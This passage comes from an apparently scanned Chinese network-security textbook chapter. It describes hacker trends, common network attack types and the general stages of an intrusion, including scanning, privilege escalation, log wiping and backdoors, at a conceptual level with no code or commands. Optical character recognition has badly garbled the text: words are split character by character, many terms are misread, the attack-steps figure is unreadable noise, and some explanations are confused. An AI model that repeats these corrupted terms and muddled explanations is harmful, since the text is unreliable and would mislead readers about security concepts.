跃 成 为 全 球 最 牛 的 “明星 黑客 ”。 而 他 本 打算 在 7 月 31 日 开幕 的 2013 年 “ 黑 帽 ” 黑 客 会 
议 上 ， 展 示 一 项 更 为 惊人 的 “黑客 绝技 ”一 一 在 9 米 之 外 入 侵 植 入 式 心 脏 起 搏 器 等 无 线 医 
疗 装置 ， 然 后 向 其 发 出 一 系列 830V 高 压 电 击 ， 从 而 令 “遥控 杀人 ”成 为 现实 ! 杰克 声称 ， 
他 已 经 发 现 了 多 家 厂商 生产 的 心脏 起 搏 器 的 安全 漏洞 。 然 而 蹊跷 的 是 ，7 月 25 日 ， 就 在 这 
项 “黑客 绝技 ”曝光 前 夕 ， 杰 克 突 然 在 美国 旧金山 神秘 死亡 。 


2.1.5 ”黑客 行为 的 发 展 趋势 
回顾 历次 发 生 的 黑客 事件 ， 我 们 可 以 发 现 黑客 发 展 的 五 大 趋势 ; 黑客 组 织 化 ， 黑 客 技 
术 工 具 化 、 智 能 化 ， 黑 客 技术 普及 化 ， 黑 客 年 轻 化 ， 黑 客 破 坏 力 扩大 化 。 

1. 黑客 组 织 化 


由 于 黑客 的 破坏 ， 人 们 的 网 络 安全 意识 开始 增强 ， 计 算 机 产品 的 安全 性 被 放 在 很 重要 
的 位 置 ， 漏 洞 和 缺陷 越 来 越 少 ;新 的 强 有 力 的 计算 机 安全 技术 及 安全 产品 也 如 雨后春笋 般 
出 现 ， 由 于 网 络 安全 知识 的 普及 ， 人 为 的 失误 和 错误 也 越 来 越 少 。 另 外 ， 反 黑客 的 措施 也 
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更 有 力 了 。 由 于 上 述 种 种 因素 ， 黑 客 开始 由 原来 的 单 兵 作战 变 成 有 组 织 的 黑客 群体 。 在 黑 
客 组 织 内 部 ， 成 员 之 间 相互 交流 技术 经 验 ， 共 同 采取 黑客 行动 ， 成 功率 很 高 ， 影 响 力也 
很 大 。 

2. 黑客 技术 的 工具 化 、 智 能 化 


黑客 事件 越 来 越 多 的 一 个 重要 原因 就 是 黑客 工具 越 来 越 多 ， 并 且 越 来 越 容易 获得 ， 据 
中 国 科 学 院 许 榕 生 研究 员 介 绍 ， 黑 客运 用 的 软件 工具 已 超过 1 000 种 。 在 互联 网 上 ， 有 大 
量 的 黑客 站 点 ， 很 多 站 点 都 有 大 量 的 黑客 工具 供用 户 下 载 ， 借 助 黑客 工具 ， 有 些 黑客 攻击 
甚至 不 需要 太 多 计算 机 知识 就 能 实施 ， 如 典型 的 Windows“ 蓝 屏 炸 弹 ” 和 ISCrasher， 只 
要 知道 被 攻击 者 的 全， 就 能 实施 有 效 的 攻击 。 

黑客 工具 的 主要 来 源 有 如 下 两 种 。 

(1) 很 多 网 络 安全 工具 可 以 当 作 黑 客 工具 来 使 用 。 同 样 是 扫描 器 ， 网 络 管理 员 可 以 用 
它 来 检查 系统 漏洞 ， 防 患 于 未 然 ， 黑 客 也 可 以 用 它 来 寻找 攻击 入 口 ， 为 实施 攻击 做 准备 
另外 还 有 很 多 常用 的 网 络 工具 也 能 当 作 黑客 工具 来 用 ， 如 Telnet、Ftp 等 。 

(2) 黑客 开发 的 工具 。 黑 客 工具 一 部 分 是 为 了 简化 攻击 、 便 于 攻击 ， 根 据 黑客 经 验 开 
发 的 ， 如 很 多 用 于 口令 攻击 、 密 码 破解 的 黑客 工具 。 另 一 部 分 是 不 断 发 现 的 网 络 漏洞 和 缺 
陷 导 致 黑客 技术 的 不 断 出 现 ， 这 些 黑客 技术 被 迅速 工具 化 ， 另 外 有 的 黑客 为 了 证 明 自 己 的 
能 力 开发 出 一 部 分 强 有 力 的 黑客 工具 ， 如 特洛伊 木马 程序 BO、NETBUS 等 。 

现在 黑客 工具 的 编写 者 采用 了 比 以 前 更 加 先进 、 更 加 智能 的 技术 ， 具 有 明显 的 智能 化 
特征 。 攻 击 工具 的 特征 码 越 来 越 难以 通过 分 析 来 发 现 ， 也 越 来 越 难以 通过 基于 特征 码 的 检 
测 系统 被 发 现 ， 而 且 现 在 的 攻击 工具 也 具备 了 相当 的 反 检测 智能 分 析 能 力 。 主 要 表现 在 以 
下 三 个 方面 。 

@ 反 检 测 技 术 。 攻 击 者 采用 了 能 够 隐藏 攻击 工具 的 技术 ， 这 使 得 安全 专家 通过 各 种 
分 析 方 法 来 判断 新 的 攻击 的 过 程 变 得 更 加 困难 。 

@ 动态 行为 。 以 前 的 攻击 工具 按照 预定 的 单一 步骤 发 起 进攻 ， 现 在 的 自动 攻击 工具 
能 够 按照 不 同 的 方法 更 改 它 们 的 特征 ， 如 随机 选择 预定 的 决策 路 径 ， 或 者 通过 入 侵 者 直接 
控制 。 

@ 攻击 工具 的 模块 化 。 和 以 前 的 攻击 工具 仅仅 实现 一 种 攻击 相 比 ， 新 的 攻击 工具 能 
够 通过 升级 或 者 对 部 分 模块 的 替换 完成 快速 更 改 。 而 且 ， 攻 击 工具 能 够 在 越 来 越 多 的 平台 
上 运行 。 例如, 许多 攻击 工具 采用 了 标准 的 协议 , 如 IRC 和 HTTP 进行 数据 和 命令 的 传输 ， 
这 样 ， 想 要 从 正常 的 网 络 流量 中 分 析出 攻击 特征 就 更 加 困难 了 。 


3. 黑客 技术 普及 化 


黑客 组 织 的 形成 和 黑客 工具 的 大 量 出 现 导致 的 一 个 直接 后 果 就 是 黑客 技术 的 普及 ， 虽 
然 在 市 面 上 可 能 看 不 到 一 本 介绍 如 何 做 黑客 、 传 授 黑客 技术 的 书 , 但 是 在 Internet 上 , 黑客 
与 黑客 组 织 办 的 传授 黑客 技术 的 站 点 却 比 比 皆 是 。 这 些 黑客 站 点 提供 黑客 工具 、 公 布 系统 
漏洞 、 公 开 传授 黑客 技术 和 进行 黑客 教学 等 ， 甚 至 还 有 网 上 论坛 、 网 上 聊天 ， 相 互 交流 黑 
客 技 术 经 验 ， 协 调 黑 客 行动 。 黑 客 事件 的 剧 增 、 黑 客 组 织 规模 的 扩大 、 黑 客站 点 的 大 量 涌 
现 ， 也 说 明了 黑客 技术 开始 普及 ， 甚 至 很 多 十 多 岁 的 年 轻 人 也 有 了 自己 的 黑客 站 点 ， 如 广 
州 的 光华 黑 客站 点 。 从 很 多 BBS 上 也 可 以 看 出 学 习 探讨 黑客 技术 的 人 越 来 越 多 ， 我 们 可 以 
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禁止 有 害 书 籍 刊物 的 传播 ， 却 难以 禁止 Internet 上 有 害 信息 的 传播 交流 。 

黑客 技术 普及 化 的 原因 有 以 下 三 个 方面 。 

(1) 黑客 组 织 的 形成 ， 使 黑客 的 人 数 迅 速 扩大 ， 如 美国 的 “大 属 杀 2600” 的 成 员 就 曾 
达到 150 万 人 ， 这 些 黑客 组 织 还 提供 大 量 的 黑客 工具 ， 使 掌握 黑客 技术 的 人 数 剧 增 。 

(2) 黑客 站 点 的 大 量 出 现 。 任 何人 都 能 通过 Internet 访问 这 些 站 点 , 学习 黑客 技术 不 再 
是 一 件 困难 的 事 。 

(3) 计算 机 教育 的 普及 ， 使 很 多 人 在 学 习 黑 客 技术 上 不 再 存在 太 多 的 专业 障碍 。 

应 当 指出 ， 黑 客 技术 并 不 是 很 神秘 的 ， 它 也 是 计算 机 技术 的 一 种 ， 对 黑客 技术 的 适当 
了 解 是 很 有 必要 的 ， 这 样 才能 做 到 知己 知 彼 、 百 战 不 列 ， 事 实 上 ， 很 多 网 络 安全 专家 就 十 
分 精通 黑客 技术 ， 甚 至 有 些 还 曾经 当 过 黑客 。 黑 客 技术 的 工具 化 和 普及 化 ， 也 产生 了 一 个 
让 我 们 深 感 忧虑 的 后 果 一 一 黑客 的 年 轻 化 。 


4. 黑客 年 轻 化 


由 于 中 国 互联 网 的 普及 ， 形 成 全 球 一 体 化 ， 甚 至 连 很 多 偏远 的 地 方 也 可 以 从 网 络 上 接 
触 到 世界 各 地 的 信息 资源 ， 所 以 越 来 越 多 对 黑客 感 兴趣 的 中 学 生 , 也 已 经 踏足 到 这 个 领域 。 
有 资料 统计 , 我 国 计 算 机 犯罪 者 主要 是 19 一 30 岁 的 男性 , 平均 年 龄 约 为 23 岁 , 而 央视 《中 
国法 制 报道 》 则 将 这 个 年 龄 降低 到 19 岁 。 这 种 现象 反映 出 我 们 的 网 络 监管 及 相关 法 律 部 门 
的 管理 还 存在 着 极 大 的 漏洞 。 

一 桩 又 一 桩 龙 动 性 黑客 事件 的 主角 都 是 一 些 年 轻 人 ， 为 什么 现在 年 轻 的 黑客 越 来 越 
多 ? 究 其 原因 ， 有 多 方面 的 因素 在 起 作用 : 第 一 ， 计 算 机 教育 在 许多 国家 的 普及 使 青少年 
的 计算 机 水 平 提高 很 快 ， 各 国 的 政府 和 教育 管理 机 构 都 大 力 提倡 教师 应 用 现代 教育 技术 手 
段 进 行 教学 ， 要 使 每 个 学 生 都 会 使 用 计算 机 ; 第 二 ， 黑 客 技术 的 普及 和 黑客 工具 的 大 量 出 
现 ， 使 青少年 更 容易 学 习 与 掌握 黑客 技术 ， 青 少年 的 好 奇 心 和 模仿 能 力 强 ， 求 知 欲 和 表现 
欲 旺盛 ， 但 自制 力 、 判 断 力 却 很 弱 ， 法 制 观念 淡薄 ， 在 学 习 黑 客 技术 后 ， 很 容易 把 网 络 作 
为 施展 才能 的 场所 ; 第 三 ， 有 关 Internet 的 法 律 和 法 规 还 不 很 健全 ， 发 现 黑客 也 有 相当 的 技 
术 难 度 ， 很 多 黑 站 点 出 于 种 种 考虑 ， 不 敢 承认 被 黑 事实 ， 使 很 多 黑客 事件 不 了 了 之 ， 使 小 
黑客 们 有 恒 无 丽 ， 第 四 ， 青 少年 的 网 络 道德 教育 还 是 一 片 空白 ， 黑 客 行为 是 存在 于 网 络 虚 
拟 世界 里 的 ， 它 不 同 于 平常 可 见 的 不 良 行为 ， 大 多 数学 校 与 家 庭 对 青少年 的 网 上 恶作剧 行 
为 根本 无 法 判别 ， 就 更 别 说 教育 了 。 另 外 ， 与 论 总 是 把 黑客 描绘 成 神出鬼没 、 反 叛 、 天 才 
的 形象 ， 甚 至 说 是 网 络 时 代 的 牛仔 ， 计 算 机 时 代 的 英雄 ， 这 也 很 容易 误导 青少年 。 


5. 黑客 的 破坏 力 扩大 化 


中 国电 子 商务 研究 中 心 最 新 数据 显示 ，2012 年 国内 网 购 市 场 交易 规模 已 经 超过 1 万 亿 
大 关 ， 但 在 市 场 繁荣 的 背后 ， 却 是 近年 来 手段 不 断 翻 新 的 黑客 行为 ， 并 逐渐 形成 了 研发 、 
制作 、 调 试 、 销 售 、 教 学 等 各 环节 完备 的 “黑客 产业 链 ”。 国 内 多 家 网 络 安全 公司 监测 数 
据 显 示 ， 购 物 欺诈 网 站 、 股 票 或 彩票 欺诈 网 站 、 木 马 、QQ 盗号 、 钓 鱼网 站 等 各 类 网 络 诈 
骗 手 段 日 益 独 狐 ， 给 用 户 造成 的 直接 经 济 损失 已 超过 50 亿 元 ， 并 按 每 年 15% 左 右 的 速 
度 增长 。 

值得 注意 的 是 ， 随 着 网 购 的 日 益 普及 ， 以 及 交易 量 的 不 断 增长 ， 钓 鱼网 站 这 一 网 络 欺 
诈 方式 正在 被 黑客 广泛 使 用 ， 并 呈现 出 逐年 恶化 的 趋势 。 
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以 针对 网 购 的 钓鱼 网 站 为 例 ，360 发 布 的 《2012 年 中 国 网 购 安全 报告 》 显 示 ， 钓 鱼网 
站 的 诈骗 形式 正在 不 断 变化 , 已 经 衍生 出 “假冒 淘宝 ”、“ 假 药 网 站 ”、“ 网 游 交 易 欺诈 ”、 
“假冒 品牌 官网 ”、“ 手 机 充值 欺诈 ”、“ 假 冒 票务 网 站 ”和 “假冒 网 银 ” 等 多 种 形式 。 
而 在 传播 方式 上 ， 这 类 诈骗 方式 也 有 了 新 的 变化 。 据 介绍 ， 黑 客 开始 利用 搜索 引擎 的 竞价 
排名 机 制 漏洞 ， 制 作假 冒 网 站 ， 然 后 购买 竞价 排名 系统 中 的 关键 词 ， 使 假冒 网 站 排 在 搜索 
结果 页 面 的 重要 位 置 ， 使 得 网 民 误 入 钓鱼 网 站 。 目 前 ,我国 黑客 产业 链 各 环节 涉及 的 诈骗 
金额 目前 已 超过 百 亿 元 ， 给 网 民 造 成 的 经 济 损失 更 是 难以 估量 。 


2.2 常见 的 网 络 攻击 


网 络 攻击 日 益 成 为 旨 在 窃取 金钱 的 职业 犯罪 行为 。 虽 然 人 们 过 去 一 直 认为 病毒 作者 和 
黑客 只 是 一 些 令 人 讨厌 的 机 敏 少年 ， 但 是 目前 最 流行 的 病毒 和 黑客 技巧 与 技术 都 已 经 被 更 
高 级 的 犯罪 分 子 所 掌握 。 

如 果 没 有 适当 的 安全 措施 和 安全 的 访问 控制 方法 ， 在 网 络 上 传输 的 数据 很 容易 受到 各 
式 各 样 的 攻击 。 网 络 攻击 既 有 被 动 型 的 ， 也 有 主动 型 的 。 被 动 攻击 通常 指 信息 受到 非法 侦 
听 ， 而 主动 攻击 则 往往 意味 着 对 数据 甚至 网 络 本 身 恶 意 的 算 改 和 破坏 。 以 下 列举 几 种 常见 
的 网 络 攻 击 类 型 。 

1. 窃听 

一 般 情况 下 ， 绝 大 多 数 网 络 通信 都 以 一 种 不 安全 的 “明文 ”形式 进行 ， 这 就 给 攻击 者 
很 大 的 机 会 ， 只 要 获取 数据 通信 路 径 ， 就 可 轻易 “ 侦 听 ”或 者 “解读 ”明文 数据 流 。“ 侦 
听 ” 型 攻击 者 ， 虽 然 不 破坏 数据 ， 却 可 能 造成 通信 信息 外 泄 ， 甚 至 危及 敏感 数据 安全 。 对 
于 多 数 普 通 企业 来 说 , 这 类 网 络 窃听 行为 已 经 构成 了 网 管 员 所 面临 的 最 大 的 网 络 安全 问题 。 

2. 算 改 数据 

网 络 攻 击 者 在 非法 读 取 数 据 后 ， 下 一 步 通 常 就 会 想 去 算 改 它 ， 而 且 这 种 算 改 一 般 可 以 
做 得 让 数据 包 的 发 送 方 和 接收 方 不 知 不 觉 。 但 作为 网 络 通信 用 户 ， 即 使 并 非 所 有 的 通信 数 
据 都 是 高 度 机 密 的 ， 也 不 想 看 到 数据 在 传输 过 程 中 出 现任 何 差错 。 比 如 在 网 上 购物 ， 一 旦 
我 们 提交 了 购物 订单 ， 谁 也 不 会 希望 订单 中 的 任何 内 容 被 人 肆意 算 改 。 

3. 身份 欺骗 (IP 地 址 欺骗 ) 

大 多 数 网 络 操作 系统 使 用 下 地 址 来 标识 网 络 主机 。 然 而 ， 在 一 些 情况 下 ， 貌 似 合法 的 
人 P 地址 很 有 可 能 是 经 过 伪装 的 ， 这 就 是 所 谓 他 地 址 欺骗 ， 也 就 是 身份 欺骗 。 另 外 ， 网 络 攻 
击 者 还 可 以 使 用 一 些 特殊 的 程序 ， 对 某 个 从 合法 地 址 传 来 的 数据 包 做 些 手脚 ， 借 此 合法 地 
址 来 非法 侵入 某 个 目标 网 络 。 

4. 基于 口令 攻击 (Password-Based Attacks) 

基于 口令 的 访问 控制 是 一 种 最 常见 的 安全 措施 。 这 意味 着 我 们 对 某 台 主机 或 网 络 资源 
的 访问 权限 取决 于 我 们 是 谁 ， 也 就 是 说 ， 这 种 访问 权 是 基于 我 们 的 用 户 名 和 账号 密码 的 。 

攻击 者 可 以 通过 多 种 途径 获取 用 户 合法 账号 ， 一 旦 他 们 拥有 了 合法 账号 ， 也 就 拥有 了 
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与 合法 用 户 同等 的 网 络 访问 权限 。 因 此 ， 假 设 账 号 被 盗 的 用 户 具 有 网 管 权限 的 话 ， 攻 击 者 
甚至 可 以 借 机 给 自己 再 创建 一 个 合法 账号 以 备 后 用 。 在 有 了 合法 账号 进入 目标 网 络 后 ， 攻 
击 者 也 就 可 以 随心 所 欲 地 盗 取 合法 用 户 信息 以 及 网 络 信息 : 修改 服务 器 和 网 络 配置 ， 包 括 
访问 控制 方式 和 路 由 表 ; 算 改 、 重 定向 、 删 除数 据 等 。 

5. 拒绝 服务 攻击 (Denial-of-Service Attack) 


与 盗用 口令 攻击 不 同 ， 拒 绝 服务 攻击 的 目的 不 在 于 窃取 信息 ， 而 是 要 使 某 个 设备 或 网 
络 无 法 正常 运作 。 在 非法 侵入 目标 网 络 后 ， 这 类 攻击 者 惯用 的 攻击 手法 有 以 下 几 种 。 

(1) 首先 设法 转移 网 管 员 的 注意 力 ， 使 之 无 法 立刻 察觉 有 人 入 侵 ， 从 而 给 攻击 者 自己 
争取 时 间 。 

(2) 向 某 个 应 用 系统 或 网 络 服务 系统 发 送 非法 指令 ， 致 使 系统 出 现 异 常 行为 或 异常 
终止 。 

(3) 向 某 台 主机 或 整个 网 络 发 送 大 量 数 据 流 ， 导 致 网 络 因 不 堪 过 载 而 瘫痪 。 

(4) 拦截 数据 流 ， 使 授权 用 户 无 法 取得 网 络 资源 。 


6. 中 间 人 攻击 


中 间 人 攻击 (Man-in-the-Middle Attack， 简 称 “MITM 攻击 ”) 是 一 种 “间接 ”的 入 侵 攻 
击 ， 这 种 攻击 模式 是 通过 各 种 技术 手段 将 受 入 侵 者 控制 的 一 台 计 算 机 虚拟 放置 在 网 络 连接 
中 的 两 台 通信 计算 机 之 间 ， 这 人 台 计算 机 就 称 为 “中 间 人 ”。 然 后 入 侵 者 把 这 人 台 计 算 机 模拟 
一 台 或 两 台 原始 计算 机 ， 使 “中 间 人 ”能 够 与 原始 计算 机 建立 活动 连接 并 允许 其 读 取 或 算 
改 传递 的 信息 ， 然 而 两 个 原始 计算 机 用 户 却 认 为 他 们 是 在 互相 通信 ， 因 而 这 种 攻击 方式 并 
不 很 容易 被 发 现 。 所 以 中 间 人 攻击 很 早 就 成 为 黑客 常用 的 一 种 古老 的 攻击 手段 ， 并 且 一 直 
到 今天 还 具有 极 大 的 扩展 空间 。 

在 网 络 安全 方面 ，MITM 攻击 的 使 用 是 很 广泛 的 ， 曾 经 独 狐 一 时 的 SMB 会 话 劫持 、 
DNS 欺骗 等 技术 都 是 典型 的 MITM 攻击 手段 。 如 今 , 在 黑客 技术 越 来 越 多 地 运用 于 以 获取 
经 济 利益 为 目标 的 情况 下 时 ，MITM 攻击 成 为 对 网 银 、 网 游 、 网 上 交易 等 最 有 威胁 并 且 最 
具 破 坏 性 的 一 种 攻击 方式 。 

7. 盗 取 密 钥 攻 击 (Compromised-Key Attack) 


虽然 一 般 说 来 ， 盗 取 密 钥 是 很 困难 的 ， 但 并 非 不 可 能 。 通 常 我 们 把 被 攻击 者 盗 取 的 密 
钥 称 为 “已 泄密 的 密 钥 ”。 攻 击 者 可 以 利用 这 个 已 泄密 的 密 钥 对 数据 进行 解密 和 修改 ， 甚 
至 还 能 试图 利用 该 密 钥 计 算 其 他 密 钥 ， 以 获取 更 多 的 加 密 信息 。 

8. Sniffer 攻击 (Sniffer Attack) 


Sniffer 是 指 能 解读 、 监 视 、 拦 截 网 络 数据 交换 以 及 可 以 阅读 数据 包 的 程序 或 设备 。 如 
果 数 据 包 没有 经 过 加 密 ，Sniffer 可 以 将 该 数据 包 中 的 所 有 数据 信息 一 览 无 余 。 即 使 经 过 封 
装 的 隧道 数据 包 ，Sniffer 也 可 以 在 对 其 进行 解 封装 后 再 进行 读 取 ， 除 非 该 隧道 数据 经 过 加 
密 而 攻击 者 没有 得 到 解密 所 需要 的 密 钥 。 利 用 Sniffer， 攻 击 者 除了 可 以 读 取 通信 数据 外 ， 
还 可 以 对 目标 网 络 进行 分 析 , 进一步 获取 所 需 资源 ， 甚 至 可 以 导致 目标 网 络 的 崩溃 或 瘫痪 。 
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9. 应 用 层 攻 击 


应 用 层 攻击 (Application Layer Attack) 直 接 将 目标 对 准 应 用 系统 服务 器 ， 应 用 层 攻击 的 
攻击 者 往往 就 是 设计 该 应 用 系统 的 程序 员 。 所 谓 应 用 层 攻击 是 指 攻 击 者 故意 在 服务 器 操作 
系统 或 应 用 系统 中 制造 一 个 后 门 ， 以 便 可 以 绕 过 正常 的 访问 控制 。 特 洛 伊 木马 就 是 一 个 非 
常 典型 的 应 用 层 攻击 程序 ， 攻 击 者 利用 这 个 后 门 ， 可 以 控制 整个 用 户 的 应 用 系统 ， 还 可 以 
实现 以 下 操作 。 

(1) 阅读 、 添 加 、 删 除 、 修 改 用 户 数据 或 操作 系统 。 

(2) 在 用 户 应 用 系统 中 引入 病毒 程序 。 

(3) 引入 Sniffer， 对 用 户 网 络 进行 分 析 ， 以 获取 所 需 信 息 ， 并 导致 用 户 网 络 的 崩溃 或 
瘫痪 。 

(4) 引起 用 户 应 用 系统 的 异常 终止 。 

(5) 解除 用 户 系统 中 的 其 他 安全 控制 ， 为 其 新 一 轮 攻击 打开 方便 之 门 。 


2.2.1 攻击 目的 


网 络 攻击 正 朝 着 具有 更 多 的 商业 动机 发 展 。 随 着 动机 改变 , 质量 也 在 改变 。 笔 者 认为 ， 
在 许多 情况 下 ， 网 络 攻击 都 是 专业 软件 开发 人 员 所 为 。 他 们 的 主要 目的 如 下 。 

(1) 窃取 信息 。 

(2) 获取 口令 。 

(3) 控制 中 间 站 点 。 

(4) 获得 超级 用 户 权 限 。 


2.2.2 ”攻击 事件 分 类 


在 信息 系统 中 ， 存 在 三 类 安全 威胁 。 

(1) 外 部 攻击 : 攻击 者 来 自 系统 外 部 。 

(2) 内 部 攻击 : 内 部 越权 行为 。 

(3) 行为 滥用 : 合法 用 户 滥用 特权 。 

实施 外 部 攻击 的 方法 很 多 ， 从 攻击 者 目的 的 角度 来 讲 ， 可 将 攻击 事件 分 为 以 下 五 类 。 

1. 破坏 型 攻击 

拒绝 服务 DoS 攻击 是 破坏 型 攻击 中 最 常见 的 手段 ,主要 包括 ping of death、ICMP Flood、 
Teardrop、UDP flood、SYN flood、Land、Smurf、Fraggle、 上 畸形 消息 攻击 、 分 布 式 拒绝 服 
务 攻击 ddos、 目 的 地 不 可 到 达 攻 击 、 电 子 邮 件 炸 弹 、 对 安全 工具 的 拒绝 服务 攻击 等 。 


2. 利用 型 攻击 

利用 型 攻击 是 一 类 试图 直接 对 机 器 进行 控制 的 攻击 ， 最 常见 的 有 三 种 : 口令 猜测 、 特 
洛 伊 木 马 、 缓 冲 区 溢出 。 

3. 信息 收集 型 攻击 

信息 收集 型 攻击 并 不 对 目标 本 身 造 成 危害 ， 这 类 攻击 被 用 来 为 进一步 入 侵 提 供 有 用 的 
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信息 。 

扫描 技术 包括 : 地 址 扫描 、 端 口 扫描 、 反 响 映射 、 慢 速 扫 描 、 漏 洞 扫描 。 

体系 结构 探测 即 挖掘 出 被 攻击 主机 的 系统 特征 ， 如 操作 系统 、 系 统 配置 、 应 用 软件 等 ， 
以 方便 利用 漏洞 或 其 他 手段 进行 攻击 。 

利用 信息 服务 包括 : DNS 域 转换 、Finger 服务 (79 号 端口 )、 LDAP(Lightweight Directory 
Access Protocol， 轻 量 目录 访问 协议 )， 它 是 基于 X.500 标准 的 , 一 般 使 用 TCP 的 389 端口 。 

4. 网 络 欺骗 攻击 

网 络 欺骗 攻击 包括 DNS 欺骗 攻击 、 电 子 邮 件 欺骗 、Web 欺骗 ，IP 欺骗 。 

5. 垃圾 信息 攻击 


垃圾 信息 攻击 是 以 传播 特定 信息 为 目的 ， 如 广告 信息 等。 
2.3 攻击 步骤 


黑客 入 侵 攻 击 的 一 般 过 程 如 图 2-1 所 示 。 

1. 确定 攻击 的 目标 

入 侵 的 前 提 条 件 是 确定 攻击 目标 ， 而 这 种 确定 往往 都 是 有 某 种 目的 的 ， 如 商业 目的 、 
报复 目的 和 练习 等 。 当 然 最 终 的 结果 都 是 为 了 获得 对 目标 主机 的 控制 权 。 

网 络 上 有 许多 主机 , 黑客 首先 要 寻找 他 的 目标 主机 , 当然 真正 能 标识 主机 的 是 瑟 地 址 ， 
黑客 利用 域名 和 了 P 地 址 就 可 以 顺利 地 找到 目标 主机 。 

2. 收集 被 攻击 对 象 的 有 关 信 息 

黑客 一 般 会 利用 下 列 的 公开 协议 或 工具 来 收集 相关 信息 。 

(1) SNMP 协议 : 用 来 查阅 网 络 系统 路 由 器 的 路 由 表 ， 从 而 了 解 目标 主机 所 在 网 络 的 
拓扑 结构 及 其 内 部 细节 。 


‘站 站 广 ll 
| 利 

| 由 用 除 | 1 
TY 各 痕 1 
1 | 确 准 |11 | 蜂 | | 种 迹 | |! 
1 | 定 | | 信 | | 备 |) 1 | 误 | | 手 pe 
| 攻 | 名 攻 上 HL > 上 段 | 植 | 
| 吉 站 | 鱼 丰 | 击 [ 中 | 品 站 | 登 入 | | 
1| 目 | | 于 | | 工 |! 1 | 位 | | 录 局 | 
1 | 的 具 |11 | 置 | | 上 门 | | 
由 和 | 
上 > 退 1 
Hi 
|。 攻击 准备 阶段 。 | | 。。 攻击 实施 阶段 善后 阶段 | 
让 二 二 后 云云 

图 2-1 攻击 步骤 
(2) TraceRoute 程序 : 能 够 用 该 程序 获得 到 达 目 标 主机 所 要 经 过 的 网 络 数 和 路 由 器 数 。 


© 


(CG 计 算 机 网 络 安全 (第 2 版 ) 


- 潼 洲 基 类 半 ”过 溢 开 评 上 H 册 囊 沼 卫 


(3) Whois 协议 : 该 协议 的 服务 信息 能 提供 所 有 有 关 的 DNS 域 和 相关 的 管理 参数 。 

(4) DNS 服务 器 :该 服务 器 提供 了 系统 中 可 以 访问 的 主机 的 他 地址 表 和 它们 所 对 应 的 
主机 名 。 

(5) Finger 协议 : 用 来 获取 一 个 指定 主机 上 的 所 有 用 户 的 详细 信息 (如 注册 名 、 电 话 号 
码 、 最 后 注册 时 间 以 及 他 们 有 没有 读 邮件 等 )。 

(6) Ping 实用 程序 : 可 以 用 来 确定 一 个 指定 的 主机 的 位 置 。 

(7) 自动 Wardialing 软件 : 可 以 向 目标 站 点 一 次 连续 拨 出 大 批 电话 号 码 ， 直 到 遇 到 某 
一 正确 的 号 码 使 调制 解 调 器 响应 为 止 。 

(8) 自 编 程序 : 对 某 些 系统 ，Intermet 上 已 发 布 了 其 安全 漏洞 所 在 ， 但 用 户 由 于 不 懂 或 
一 时 芍 忽 未 及 时 打上 网 上 发 布 的 该 系统 的 “补丁 ”程序 ， 那 么 黑客 就 可 以 自己 编写 一 段 程 
序 进入 该 系统 进行 破坏 。 

在 收集 了 信息 之 后 ， 黑 客 就 开始 对 主机 进行 全 面 的 系统 分 析 ， 以 寻求 该 主机 的 安全 漏 
洞 或 安全 弱点 。 

3. 利用 适当 的 扫描 工具 


利用 公开 的 工具 进行 扫描 ， 如 Intemet 的 电子 安全 扫描 程序 ISS(Internet Security 
Scanner)、 审 计 网 络 用 的 安全 分 析 工 具 SATAN(Secure Analysis Tool for Auditing Network) 
等 。 这 样 的 工具 可 以 对 整个 网 络 或 子 网 进行 扫描 ， 寻 找 安全 漏洞 (注意 ， 这 是 针对 两 台 以 上 
主机 的 局 域 网 情况 )。 

这 些 工 具 都 有 两 面 性 。 系 统管 理 员 使 用 它们 以 帮助 发 现 其 管理 的 网 络 系统 内 部 隐藏 的 
安全 漏洞 ， 从 而 确定 系统 中 哪些 主机 需要 用 “补丁 ”程序 去 堵塞 漏洞 ， 而 黑客 也 可 以 利用 
这 些 工具 ， 收 集 目标 系统 的 信息 ， 获 取 攻 击 目 标 系 统 的 非法 访问 权 。 


4. 实施 攻击 


黑客 一 旦 获得 了 系统 的 访问 权 后 ， 可 能 会 进行 以 下 操作 。 

(1) 试图 毁 掉 攻击 入 侵 的 痕迹 ， 并 在 受到 损害 的 系统 上 建立 新 的 安全 漏洞 或 后 门 ， 以 
便 在 先前 的 攻击 点 被 发 现 之 后 ， 继 续 访 问 这 个 系统 。 

(2) 在 系统 中 安装 探测 软件 ， 包 括 木马 ， 用 以 掌握 用 户 的 一 切 活动 ， 以 收集 比较 感 兴 
趣 的 东西 ， 瑞 星 公 司 在 近 两 年 的 中 国内 地 互联 网 安全 报告 中 明确 指出 ， 用 户 的 电子 银行 账 
号 和 密码 之 类 的 信息 是 黑客 最 感 兴趣 的 。 

(3) 如 果 黑 客 攻 击 的 主机 是 在 一 个 局 域 网 中 ， 黑 客 就 可 能 会 将 这 台 主 机 作为 对 整个 网 
络 展开 攻击 的 大 本 营 。 


5. 巩固 控制 


当 黑 客 成 功 入 侵 了 一 个 Web 服务 器 之 后 ， 一 般 情 况 下 ， 只 有 GUESTS 组 的 权限 ， 而 
他 们 的 最 终 目 的 是 为 了 得 到 整个 服务 器 的 控制 权 ， 这 个 时 候 ， 他 们 就 会 使 用 SA( 一 种 安全 
关联 ， 对 两 台 计算 机 之 间 的 策略 协议 进行 编码 ， 指 定 它们 将 使 用 哪些 算法 和 什么 样 的 密 钥 
长 度 ， 以 及 实际 的 密 钥 本 身 ) 等 手段 提升 自己 的 权限 ， 获 取 控 制 权 。 在 取得 控制 权 以 后 ， 黑 
客 也 不 会 马上 进行 破坏 活动 ， 如 删除 数据 、 涂 改 网 页 等 。 黑 客 为 了 能 长 时 间 保留 和 巩固 他 
对 系统 的 控制 权 ， 不 被 管理 员 发 现 ， 他 就 要 清除 入 侵 记录 。 入 侵 记 录 保 存在 日 志 中 ， 黑 客 
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当然 不 会 留 下 这 些 “ 犯 罪证 据 ”， 他 会 删除 日 志 或 用 假日 志 覆盖 原 有 内 容 。 

6. 继续 深入 

(1) 安装 后 门 。 

黑客 入 侵 成 功 后 ， 为 了 方便 下 次 进入 ， 都 会 安装 一 个 不 容易 被 发 现 的 后 门 程序 ， 免 得 
下 次 进入 时 ， 还 需要 经 过 前 面 那些 复杂 的 步骤 。 

(2) 修补 漏洞 。 

黑客 如 果 成 功 入 侵 了 一 台 服 务 器 之 后 一 般 会 修复 漏洞 ， 原 因 是 这 人 台 机 器 很 有 可 能 在 未 
来 的 几 天 内 被 其 他 黑客 入 侵 ， 而 其 他 黑客 入 侵 后 ， 如 果 发 现 该 黑客 的 后 门 ， 并 且 将 这 个 大 
